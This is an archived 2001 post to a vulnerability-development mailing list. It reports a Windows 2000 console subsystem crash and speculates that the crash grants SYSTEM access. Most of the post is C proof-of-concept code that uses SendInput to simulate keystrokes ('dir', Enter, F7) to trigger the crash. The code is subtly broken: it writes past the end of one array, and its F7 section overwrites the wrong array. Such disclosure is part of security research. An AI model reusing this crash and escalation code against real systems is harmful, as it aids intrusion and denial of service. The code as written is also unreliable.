Vulnerability Development mailing list archives
RE: bug w2k
From: "Vladimir Kraljevic" <vladimir_kraljevic () llbudapest hu>
Date: Wed, 1 Aug 2001 10:11:52 +0200
It works with the simulated keystrokes as well... I was able to track it down up to the point where subsystem crashes, but I have no more time to spend on it. I was able to get access violation system box and delay the restart; everyone with decent kernel debugger (SoftICE and kinds) can trace the exact point of the crash. I'm pretty sure that you are getting system account. If I'm right, we'll soon have nice exploit, usefull to anyone that has access to the CLI. Enough for now, some work will follow, have some ideas Vladimir P.S. You can repeat last two lines (SendInput(...)) =============================================================CUT HERE #define _WIN32_WINNT 0x0401 #include <windows.h> #include <winuser.h> #include <winnt.h> void main(int argc, char *argv[]) { //Simulate "dir\n" INPUT inDirStrokes[7]; memset(inDirStrokes, 0, sizeof(inDirStrokes)); inDirStrokes[0].type=INPUT_KEYBOARD; inDirStrokes[0].ki.dwFlags=0; inDirStrokes[0].ki.wVk=VkKeyScan('d'); inDirStrokes[1].type=INPUT_KEYBOARD; inDirStrokes[1].ki.dwFlags=KEYEVENTF_KEYUP; inDirStrokes[1].ki.wVk=VkKeyScan('d'); inDirStrokes[2].type=INPUT_KEYBOARD; inDirStrokes[2].ki.dwFlags=0; inDirStrokes[2].ki.wVk=VkKeyScan('i'); inDirStrokes[3].type=INPUT_KEYBOARD; inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP; inDirStrokes[3].ki.wVk=VkKeyScan('i'); inDirStrokes[4].type=INPUT_KEYBOARD; inDirStrokes[4].ki.dwFlags=0; inDirStrokes[4].ki.wVk=VkKeyScan('r'); inDirStrokes[5].type=INPUT_KEYBOARD; inDirStrokes[5].ki.dwFlags=KEYEVENTF_KEYUP; inDirStrokes[5].ki.wVk=VkKeyScan('r'); inDirStrokes[6].type=INPUT_KEYBOARD; inDirStrokes[6].ki.dwFlags=0; inDirStrokes[6].ki.wVk=VK_RETURN; inDirStrokes[7].type=INPUT_KEYBOARD; inDirStrokes[7].ki.dwFlags=KEYEVENTF_KEYUP; inDirStrokes[7].ki.wVk=VK_RETURN; //Simulate "<F7>\n" INPUT inF7Strokes[4]; memset(inF7Strokes, 0, sizeof(inF7Strokes)); inF7Strokes[0].type=INPUT_KEYBOARD; inF7Strokes[0].ki.dwFlags=0; inF7Strokes[0].ki.wVk=VK_F7; inF7Strokes[1].type=INPUT_KEYBOARD; inF7Strokes[1].ki.dwFlags=KEYEVENTF_KEYUP; inF7Strokes[1].ki.wVk=VK_F7; inDirStrokes[2].type=INPUT_KEYBOARD; inDirStrokes[2].ki.dwFlags=0; inDirStrokes[2].ki.wVk=VK_RETURN; inDirStrokes[3].type=INPUT_KEYBOARD; inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP; inDirStrokes[3].ki.wVk=VK_RETURN; SendInput(sizeof(inDirStrokes)/sizeof(inDirStrokes[0]), inDirStrokes, sizeof(INPUT)); SendInput(sizeof(inF7Strokes)/sizeof(inF7Strokes[0]), inF7Strokes, sizeof(INPUT)); } =============================================================CUT HERE
Current thread:
- RE: bug w2k Vladimir Kraljevic (Aug 01)